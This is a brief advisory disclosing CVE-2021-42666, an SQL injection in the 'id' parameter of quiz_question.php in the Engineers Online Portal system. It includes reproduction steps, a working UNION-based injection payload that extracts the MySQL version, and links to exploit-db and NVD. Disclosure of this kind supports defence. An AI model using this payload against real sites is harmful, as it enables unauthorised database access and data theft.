CVE-2021-42666 - SQL Injection vulnerability in the Engineers online portal system.
An SQL Injection vulnerability exists in the Engineers Online Portal system. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server.
Affected components -
Vulnerable page - quiz_question.php
Vulnerable parameter - "id"
- Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php
- Insert your payload in the id parameter
The following payload will allow you to extract the MySql server version running on the web server -
' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- -
https://www.exploit-db.com/exploits/50453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42666
https://nvd.nist.gov/vuln/detail/CVE-2021-42666
Alon Leviev(0xDeku), 22 October, 2021.